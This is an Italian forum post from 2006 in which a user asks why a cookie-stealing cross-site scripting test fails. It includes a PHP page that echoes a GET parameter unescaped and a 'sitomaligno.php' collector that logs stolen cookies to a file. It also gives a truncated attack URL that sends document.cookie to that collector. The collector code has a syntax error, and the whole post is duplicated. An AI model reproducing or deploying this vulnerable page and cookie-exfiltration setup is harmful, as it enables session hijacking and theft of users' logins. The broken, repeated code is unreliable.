18/06/06 21:08
lomiz
Coltivando la mia grande passione per l'Hacking oggi ho provato a testare sul mio sito il cookie stealing attraverso il Cross Site Scripting.
Ho quindi creato una pagina web sul mio sito, xss.php.
Ho inserito questo codice php:
Codice:
<?php
$var = $_GET['message'];
echo "$var";
?>
Che DOVREBBE essere bugguto e vulnerabile da XSS in quanto non c'è un controllo sul carattere <.
Ho quindi creato un altra pagina: sitomaligno.php
con questo codice:
Codice:
<html>
<head>
<title>prova</title>
</head><body>
<h1>Not Found</h1>
<?php
$data = $_GET['data'];
$fh = fopen("cookie.txt",'a+');
fwrite($fh, "$data"."\n"
fclose($fh);
?>
<p>dovrei averti rubato i cookie</p>
</body></html>
Adesso se non sbaglio dal momento che la vittima andasse qua:
theninjateam.altervista.org/hacktest/xss/…; + document.cookie</script>
Dovrei avergli rubato i cookie.
Ma tutto cio' non funziona.
Mi direte: "ovvio che non rubi i cookie... non gliel'hai dati..."
Ma non mi si forma alcun file cookie.txt quando se ne dovrebbe formare uno vuoto...
Il bello è che quando vado nel link theninjateam.altervista.org/hacktest/xss/…; + document.cookie</script> non mi carica nemmeno la pagina sitomaligno.php...
Cos'ho sbagliato?
Ho quindi creato una pagina web sul mio sito, xss.php.
Ho inserito questo codice php:
Codice:
<?php
$var = $_GET['message'];
echo "$var";
?>
Che DOVREBBE essere bugguto e vulnerabile da XSS in quanto non c'è un controllo sul carattere <.
Ho quindi creato un altra pagina: sitomaligno.php
con questo codice:
Codice:
<html>
<head>
<title>prova</title>
</head><body>
<h1>Not Found</h1>
<?php
$data = $_GET['data'];
$fh = fopen("cookie.txt",'a+');
fwrite($fh, "$data"."\n"
fclose($fh);
?>
<p>dovrei averti rubato i cookie</p>
</body></html>
Adesso se non sbaglio dal momento che la vittima andasse qua:
theninjateam.altervista.org/hacktest/xss/…; + document.cookie</script>
Dovrei avergli rubato i cookie.
Ma tutto cio' non funziona.
Mi direte: "ovvio che non rubi i cookie... non gliel'hai dati..."
Ma non mi si forma alcun file cookie.txt quando se ne dovrebbe formare uno vuoto...
Il bello è che quando vado nel link theninjateam.altervista.org/hacktest/xss/…; + document.cookie</script> non mi carica nemmeno la pagina sitomaligno.php...
Cos'ho sbagliato?
aaa